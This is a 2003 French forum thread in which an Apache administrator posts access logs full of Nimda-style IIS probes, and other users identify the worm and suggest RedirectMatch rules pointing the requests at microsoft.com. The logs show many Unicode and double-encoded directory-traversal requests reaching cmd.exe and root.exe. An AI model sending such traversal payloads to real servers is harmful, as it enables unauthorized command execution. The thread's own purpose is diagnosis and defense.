Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1269 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs
  réseaux et sécurité

  Surprise dans mes logs Apache

 


 Mot :   Pseudo :  
 
 Page :   1  2
Page Précédente
Auteur Sujet :

Surprise dans mes logs Apache

n°359327
Vibidoo
Posté le 17-11-2003 à 13:22:18  profilanswer
 


Par hasard j'ai chécker mes logs apache et voici ce que je trouve  

Code :
  1. 217.128.177.10 - - [17/Nov/2003:03:44:16 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
  2. 217.128.177.10 - - [17/Nov/2003:03:44:16 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
  3. 217.128.177.10 - - [17/Nov/2003:03:44:17 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  4. 217.128.177.10 - - [17/Nov/2003:03:44:17 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  5. 217.128.177.10 - - [17/Nov/2003:03:44:17 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  6. 217.128.177.10 - - [17/Nov/2003:03:44:18 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  7. 217.128.177.10 - - [17/Nov/2003:03:44:19 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  8. 217.128.177.10 - - [17/Nov/2003:03:44:19 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/$
  9. 217.128.177.10 - - [17/Nov/2003:03:44:20 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  10. 217.128.177.10 - - [17/Nov/2003:03:44:20 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  11. 217.128.177.10 - - [17/Nov/2003:03:44:20 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  12. 217.128.177.10 - - [17/Nov/2003:03:44:21 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  13. 217.128.177.10 - - [17/Nov/2003:03:44:21 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  14. 217.128.177.10 - - [17/Nov/2003:03:44:21 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  15. 217.128.177.10 - - [17/Nov/2003:03:44:22 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  16. 217.128.177.10 - - [17/Nov/2003:03:44:22 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  17. 217.128.177.10 - - [17/Nov/2003:04:55:27 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
  18. 217.128.177.10 - - [17/Nov/2003:04:55:28 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
  19. 217.128.177.10 - - [17/Nov/2003:04:55:29 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  20. 217.128.177.10 - - [17/Nov/2003:04:55:29 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  21. 217.128.177.10 - - [17/Nov/2003:04:55:29 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  22. 217.128.177.10 - - [17/Nov/2003:04:55:30 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  23. 217.128.177.10 - - [17/Nov/2003:04:55:30 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  24. 217.128.177.10 - - [17/Nov/2003:04:55:30 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/$
  25. 217.128.177.10 - - [17/Nov/2003:04:55:31 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  26. 217.128.177.10 - - [17/Nov/2003:04:55:31 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  27. 217.128.177.10 - - [17/Nov/2003:04:55:31 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  28. 217.128.177.10 - - [17/Nov/2003:04:55:32 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  29. 217.128.177.10 - - [17/Nov/2003:04:55:32 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  30. 217.128.177.10 - - [17/Nov/2003:04:55:33 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  31. 217.128.177.10 - - [17/Nov/2003:04:55:34 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  32. 217.128.177.10 - - [17/Nov/2003:04:55:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  33. 217.128.177.10 - - [17/Nov/2003:04:55:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  34. 217.128.177.10 - - [17/Nov/2003:07:01:56 +0000] "GET http://www.yahoo.com/ HTTP/1.1" 200 1456 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
  35. 217.128.177.10 - - [17/Nov/2003:08:02:27 +0000] "GET /scripts/nsiislog.dll" 404 326 "-" "-"
  36. 217.128.177.10 - - [17/Nov/2003:11:27:26 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
  37. 217.128.177.10 - - [17/Nov/2003:11:27:26 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
  38. 217.128.177.10 - - [17/Nov/2003:11:27:27 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  39. 217.128.177.10 - - [17/Nov/2003:11:27:27 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  40. 217.128.177.10 - - [17/Nov/2003:11:27:27 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  41. 217.128.177.10 - - [17/Nov/2003:11:27:28 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  42. 217.128.177.10 - - [17/Nov/2003:11:27:28 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  43. 217.128.177.10 - - [17/Nov/2003:11:27:28 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/$
  44. 217.128.177.10 - - [17/Nov/2003:11:27:29 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  45. 217.128.177.10 - - [17/Nov/2003:11:27:29 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  46. 217.128.177.10 - - [17/Nov/2003:11:27:29 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  47. 217.128.177.10 - - [17/Nov/2003:11:27:30 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  48. 217.128.177.10 - - [17/Nov/2003:11:27:30 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  49. 217.128.177.10 - - [17/Nov/2003:11:27:31 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  50. 217.128.177.10 - - [17/Nov/2003:11:27:31 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  51. 217.128.177.10 - - [17/Nov/2003:11:27:31 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  52. 217.128.177.10 - - [17/Nov/2003:13:02:22 +0000] "GET http://www.yahoo.com/ HTTP/1.1" 200 1456 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"


 
Le pire c'est que le mec dopit etre en IP fixe car j'ai toujours la meme adresse Ip depuis 3h à 11 heures dans mes logs Iptables .
 
Donc soit le mec est con soit il cherche à se faire enlever son ADSL .
 
Par contre , par curiosité , j'aimerais bien savoir ce qu'il essaye de faire  
 

mood
Publicité
Posté le 17-11-2003 à 13:22:18  profilanswer
 

n°359330
FloooW
Debianyse your life
Posté le 17-11-2003 à 13:26:24  profilanswer
 

bah le mec en lui même essaye pas de te faire du mal ;)
Il a un ver sur sa machine, il y est pour rien... C'est nimda je crois (à vérifier)

n°359339
Vibidoo
Posté le 17-11-2003 à 13:31:01  profilanswer
 

Mais comment il fonctionne ce vers ?
 
Et comment il détecte les Ip ?
 
 

n°359341
lebibi
Notre torture c'est la tourtel
Posté le 17-11-2003 à 13:31:33  profilanswer
 

tu rajoutes ca et ca devrait être bon ;)
 

Code :
  1. RedirectMatch (.*)root\.exe(.*) http://www.microsoft.com
  2. RedirectMatch (.*)cmd\.exe(.*) http://www.microsoft.com
  3. RedirectMatch (.*)default\.ida(.*) http://www.microsoft.com
  4. RedirectMatch (.*)favicon\.ico(.*) http://www.microsoft.com
  5. RedirectMatch (.*)\.hash(.*) http://www.microsoft.com

n°359343
Tomate
Posté le 17-11-2003 à 13:33:44  profilanswer
 

Lebibi a écrit :

tu rajoutes ca et ca devrait être bon ;)
 

Code :
  1. RedirectMatch (.*)root\.exe(.*) http://www.microsoft.com
  2. RedirectMatch (.*)cmd\.exe(.*) http://www.microsoft.com
  3. RedirectMatch (.*)default\.ida(.*) http://www.microsoft.com
  4. RedirectMatch (.*)favicon\.ico(.*) http://www.microsoft.com
  5. RedirectMatch (.*)\.hash(.*) http://www.microsoft.com



:lol:


---------------
:: Light is Right ::
n°359357
FloooW
Debianyse your life
Posté le 17-11-2003 à 13:39:13  profilanswer
 

vibidoo a écrit :

Mais comment il fonctionne ce vers ?
 
Et comment il détecte les Ip ?
 
 
 


 
Il exploite une faille des serveurs IIS, et il scanne des plages d'ip à la recherche justement de serveur IIS. QUand il en trouve un, il l'infecte et rebelotte... Mais pour plus d'infos : www.google.com
 
EDIT : Comme je suis gentil ;) http://www.cert.org/advisories/CA-2001-26.html
 
Et bonne idée de rediriger tout ça chez krosoft ;)


Message édité par FloooW le 17-11-2003 à 13:41:00
n°359373
Vibidoo
Posté le 17-11-2003 à 13:50:53  profilanswer
 

Merci  
 
c'est cool  
;)  

n°359374
Vibidoo
Posté le 17-11-2003 à 13:52:25  profilanswer
 

Au fait si je redirige tout chez Bill , ils vont pensez que c'est mon serveur qui est infecté ????
OU encore pire , que j'essaye de les hacker ?
 

n°359376
Tomate
Posté le 17-11-2003 à 13:53:22  profilanswer
 

vibidoo a écrit :

Au fait si je redirige tout chez Bill , ils vont pensez que c'est mon serveur qui est infecté ????
OU encore pire , que j'essaye de les hacker ?
 
 

:/


---------------
:: Light is Right ::
n°359381
arsunik
ma tuxitude me beastifie
Posté le 17-11-2003 à 13:57:14  profilanswer
 

Lebibi a écrit :

tu rajoutes ca et ca devrait être bon ;)
 

Code :
  1. RedirectMatch (.*)favicon\.ico(.*) http://www.microsoft.com




 
Euh le reste oui mais les favicons... :sweat:

mood
Publicité
Posté le 17-11-2003 à 13:57:14  profilanswer
 

n°359384
arsunik
ma tuxitude me beastifie
Posté le 17-11-2003 à 14:00:06  profilanswer
 

vibidoo a écrit :

Au fait si je redirige tout chez Bill , ils vont pensez que c'est mon serveur qui est infecté ????
OU encore pire , que j'essaye de les hacker ?
 
 


 
C'est pas toi qui va te connecter sur ms c'est la personne qui te scan.
Encore qu'avec ce virus je ne sais pas si ça fonctionne.

n°359392
Tomate
Posté le 17-11-2003 à 14:05:57  profilanswer
 

ArSuniK a écrit :


 
C'est pas toi qui va te connecter sur ms c'est la personne qui te scan.
Encore qu'avec ce virus je ne sais pas si ça fonctionne.
 

t es sur ??
 
car je vois pas comment ca fonctionne :D
 
apache modifie les paquets avec l adresse ip src donc ?


---------------
:: Light is Right ::
n°359416
Vibidoo
Posté le 17-11-2003 à 14:18:30  profilanswer
 

tomate77 a écrit :

t es sur ??
 
car je vois pas comment ca fonctionne :D
 
apache modifie les paquets avec l adresse ip src donc ?


 
c'est pas apache c'est Iptables  
 
mais je préfère ne pas prendre le risque

n°359451
Tomate
Posté le 17-11-2003 à 14:49:40  profilanswer
 

vibidoo a écrit :


 
c'est pas apache c'est Iptables  
 
mais je préfère ne pas prendre le risque  

heu redirectmatch tu mets pas ca ds httpd.conf ??


---------------
:: Light is Right ::
n°359478
chiendepoc​he
Posté le 17-11-2003 à 15:02:24  profilanswer
 

ArSuniK a écrit :


 
C'est pas toi qui va te connecter sur ms c'est la personne qui te scan.
Encore qu'avec ce virus je ne sais pas si ça fonctionne.
 


faux , ca sera la personne qui redirige qui sera vue par microsoft , néenmoin tres bonne idée quand meme ;) microsoft dira rien ils ont pas que ca a faire que d'éxaminer leur milliards de lignes du meme genre dans leurs logs tous les jours

n°359489
Vibidoo
Posté le 17-11-2003 à 15:05:01  profilanswer
 

tomate77 a écrit :

heu redirectmatch tu mets pas ca ds httpd.conf ??


 
Euh si c'est dans le conf d'apache  
 
Je pensais a autre chose


Message édité par Vibidoo le 17-11-2003 à 15:05:09
n°359493
Tomate
Posté le 17-11-2003 à 15:06:04  profilanswer
 

ChienDePoche a écrit :


faux , ca sera la personne qui redirige qui sera vue par microsoft , néenmoin tres bonne idée quand meme ;) microsoft dira rien ils ont pas que ca a faire que d'éxaminer leur milliards de lignes du meme genre dans leurs logs tous les jours

ah je me disais bien aussi :D


---------------
:: Light is Right ::
n°359535
arsunik
ma tuxitude me beastifie
Posté le 17-11-2003 à 15:23:10  profilanswer
 

ChienDePoche a écrit :


faux , ca sera la personne qui redirige qui sera vue par microsoft , néenmoin tres bonne idée quand meme ;) microsoft dira rien ils ont pas que ca a faire que d'éxaminer leur milliards de lignes du meme genre dans leurs logs tous les jours


 
Je viens de vérifier dans la doc d'apache.
Pour les debianeux et autres :
file:///usr/share/doc/apache/manual/mod/mod_alias.html#redirect
 

Citation :


Redirect directive
The Redirect directive maps an old URL into a new one. The new URL is returned to the client which attempts to fetch it again with the new address.


 
Ça renvoit bien la nouvelle url au client (M. nimda) qui va aller se connecter sur ms s'il gère le redirect.

n°359536
Tomate
Posté le 17-11-2003 à 15:23:43  profilanswer
 

ArSuniK a écrit :


 
Je viens de vérifier dans la doc d'apache.
Pour les debianeux et autres :
file:///usr/share/doc/apache/manual/mod/mod_alias.html#redirect
 

Citation :


Redirect directive
The Redirect directive maps an old URL into a new one. The new URL is returned to the client which attempts to fetch it again with the new address.


 
Ça renvoit bien la nouvelle url au client (M. nimda) qui va aller se connecter sur ms s'il gère le redirect.
 

:)


---------------
:: Light is Right ::
n°359551
Vibidoo
Posté le 17-11-2003 à 15:36:17  profilanswer
 

en fait si on veut embéter quelqu'un le RedirectMatch des requetes Nimda c'est aussi un truc marrant à faire    
;)
 
:sarcastic:


Message édité par Vibidoo le 17-11-2003 à 15:36:38
n°359553
Tomate
Posté le 17-11-2003 à 15:37:11  profilanswer
 

vibidoo a écrit :

en fait si on veut embéter quelqu'un le RedirectMatch des requetes Nimda c'est aussi un truc marrant à faire    
;)
 
:sarcastic:

:D
 
mais bon, spa bien :whistle:


---------------
:: Light is Right ::
n°359556
lebibi
Notre torture c'est la tourtel
Posté le 17-11-2003 à 15:38:39  profilanswer
 

bah moi je renvois chez Microsoft. C'est une faille Microsoft, et je n'ai pas IIS chez moi.
 
Je rend à César ce qui est à César :d

n°359557
kelus
Posté le 17-11-2003 à 15:38:47  profilanswer
 

m$ va se plaindre d'un ddos fait par des barbus intaigristes sous apache :D

n°359560
lebibi
Notre torture c'est la tourtel
Posté le 17-11-2003 à 15:40:02  profilanswer
 

Sinon oui faut rajouter ca dans httpd.conf

n°359572
arsunik
ma tuxitude me beastifie
Posté le 17-11-2003 à 15:57:44  profilanswer
 

vibidoo a écrit :

en fait si on veut embéter quelqu'un le RedirectMatch des requetes Nimda c'est aussi un truc marrant à faire    
;)
 
:sarcastic:


 
Hmmm, faudrait d'abord regarder la rfc sur http voir si ya pas l'adresse du serveur qui fait le redirect ou un truc du genre (je ne pense pas mais on ne sait jamais).
Enfin si ça fonctionne parce que rien ne dit que nimda le gère. Ça m'étonnerais fortement que les gars qui ont pondu ce virus se soient préoccupés de détails de ce genre.
Pour ça il faut tester ou regarder les sources de nimda.

n°359601
Kahyman
Posté le 17-11-2003 à 16:33:14  profilanswer
 

Certains ont du temps a perdre... pour emmerder MS.
 
Pour repondre a la question : ecrire un mail au hostmaster de la machine de lui dire que sa machine est infectee. Normalement la machine est soit mise en quarantaine ou est patchee dans les 24h (si tu ne tombes pas sur un blaireau). Sinon tu regardes a qui appartient l'IP et tu indiques le probleme (ripe.net est ton ami).

n°359605
Tomate
Posté le 17-11-2003 à 16:35:25  profilanswer
 

Kahyman a écrit :

Certains ont du temps a perdre... pour emmerder MS.
 
Pour repondre a la question : ecrire un mail au hostmaster de la machine de lui dire que sa machine est infectee. Normalement la machine est soit mise en quarantaine ou est patchee dans les 24h (si tu ne tombes pas sur un blaireau). Sinon tu regardes a qui appartient l'IP et tu indiques le probleme (ripe.net est ton ami).

sauf ke tu n aura pas affaire avec un webmaster mais un particulier donc DTC pour le mailer :o


---------------
:: Light is Right ::
n°359608
Vibidoo
Posté le 17-11-2003 à 16:42:46  profilanswer
 

oui c'est un particulier , abonné mamadoo

n°359609
Tomate
Posté le 17-11-2003 à 16:43:01  profilanswer
 

vibidoo a écrit :

oui c'est un particulier , abonné mamadoo

ct sur ca ;)


---------------
:: Light is Right ::
n°359615
Vibidoo
Posté le 17-11-2003 à 16:48:11  profilanswer
 

En tous cas le nimda il lache pas prise j'ai fait les redirectmatch dans mes conf + DROP de l'IP et 10 mn encore je le voyait dans mes log (kernel) .
 
C'est que c'est tétue ces petits vers


Message édité par Vibidoo le 17-11-2003 à 16:48:22
n°359617
Kahyman
Posté le 17-11-2003 à 16:51:22  profilanswer
 

tomate77 a écrit :

sauf ke tu n aura pas affaire avec un webmaster mais un particulier donc DTC pour le mailer :o


 
S'il ne repond pas ? Tu ecris un mail a wannadoo signalant qu'un de leurs clients (etc...) et que tu exiges qu'ils reglent le probleme.
 
Non mais vous n'avez jamais fait ca ?
 
Et tes "DTC" tu te les garde.

n°359618
Tomate
Posté le 17-11-2003 à 16:52:47  profilanswer
 

Kahyman a écrit :


 
S'il ne repond pas ? Tu ecris un mail a wannadoo signalant qu'un de leurs clients (etc...) et que tu exiges qu'ils reglent le probleme.
 
Non mais vous n'avez jamais fait ca ?
 
Et tes "DTC" tu te les garde.

sauf ke mamadoo risque fort de closed le compte du monsieur alors ke ce n est pas un "pirate"  :sarcastic: (j ai vu un poste sur WSR d un gars a ki s est arrive :/)


Message édité par Tomate le 17-11-2003 à 16:53:26

---------------
:: Light is Right ::
n°359626
arsunik
ma tuxitude me beastifie
Posté le 17-11-2003 à 16:57:05  profilanswer
 

mamadoo risque surtout de jeter le mail à la poubelle ;)

n°359627
Tomate
Posté le 17-11-2003 à 17:00:39  profilanswer
 

ArSuniK a écrit :

mamadoo risque surtout de jeter le mail à la poubelle ;)
 

pas sur
 
comme je l ai dis, un hard de WSR a eu son compte closed pour une histoire comme ca :/


---------------
:: Light is Right ::
n°359629
Kahyman
Posté le 17-11-2003 à 17:03:10  profilanswer
 

tomate77 a écrit :

sauf ke mamadoo risque fort de closed le compte du monsieur alors ke ce n est pas un "pirate" :sarcastic:  


 
une machine verollee doit etre mise en quarantaine... ce qui ne signifie pas fermeture de compte (coupure de connexion le temps d'une correction de probleme != fermeture de compte).
 
Mais il est clair qu'il est plus intelligent de laisser faire et de rediriger vers MS que d'informer d'un probleme qui risque de veroller d'autres machines...
 
anyway... je vais boire une biere

n°359634
Kahyman
Posté le 17-11-2003 à 17:06:16  profilanswer
 

tomate77 a écrit :

un hard de WSR a eu son compte closed pour une histoire comme ca :/


 
Quand on est incapable de poser un patch pour un probleme existant depuis 3 ans c'est merite...
 
Et encore une fois : j'ai dis "ecrire au hostmaster" (je n'ai jamais vu de site web sans adresse mail pour contacter le webmaster)... puis seulement ecrire au provider.

n°359636
Vibidoo
Posté le 17-11-2003 à 17:06:53  profilanswer
 

Kahyman a écrit :


 
[g]S'il ne repond pas ? [/g)Tu ecris un mail a wannadoo signalant qu'un de leurs clients (etc...) et que tu exiges qu'ils reglent le probleme.
 
Non mais vous n'avez jamais fait ca ?
 
Et tes "DTC" tu te les garde.


 
Kahyman  
 
je veux bien ecrire au particulier , mais j'ai juste son IP je sais meme pas si elle est dynamique ou fixe .
 
Mon seul moyen serait de prévenir son FAI .


Message édité par Vibidoo le 17-11-2003 à 17:07:42
n°359638
Tomate
Posté le 17-11-2003 à 17:07:38  profilanswer
 

oue oue
 
bref, moi je m en fou, suis sous linux :D


---------------
:: Light is Right ::
n°359639
Vibidoo
Posté le 17-11-2003 à 17:08:03  profilanswer
 

on l'est tous sous OSA non ?

n°359641
Tomate
Posté le 17-11-2003 à 17:08:30  profilanswer
 

vibidoo a écrit :

on l'est tous sous OSA non ?

nan
antp, romf, F18, ... :D


---------------
:: Light is Right ::
mood
Publicité
Posté le   profilanswer
 

 Page :   1  2
Page Précédente

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Linux et OS Alternatifs
  réseaux et sécurité

  Surprise dans mes logs Apache

 

Sujets relatifs
Apache / Tomcat cacher la versionapache / tomcat cacher la version
Apache + VirtualHost[Divers] Questions sur linux... (et apache aussi)
Apache, flux d'image et RFC HTTP...[resolu][apache] problème de virtualhost
pasges man via Apache 2 ?Erreur suite a la migration de Apache 1.3 à 2.0.47
apache et permission denied sur un repertoire...Gentoo : cdrtools compile pas && Un parseur de logs pour apache ?
Plus de sujets relatifs à : Surprise dans mes logs Apache


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR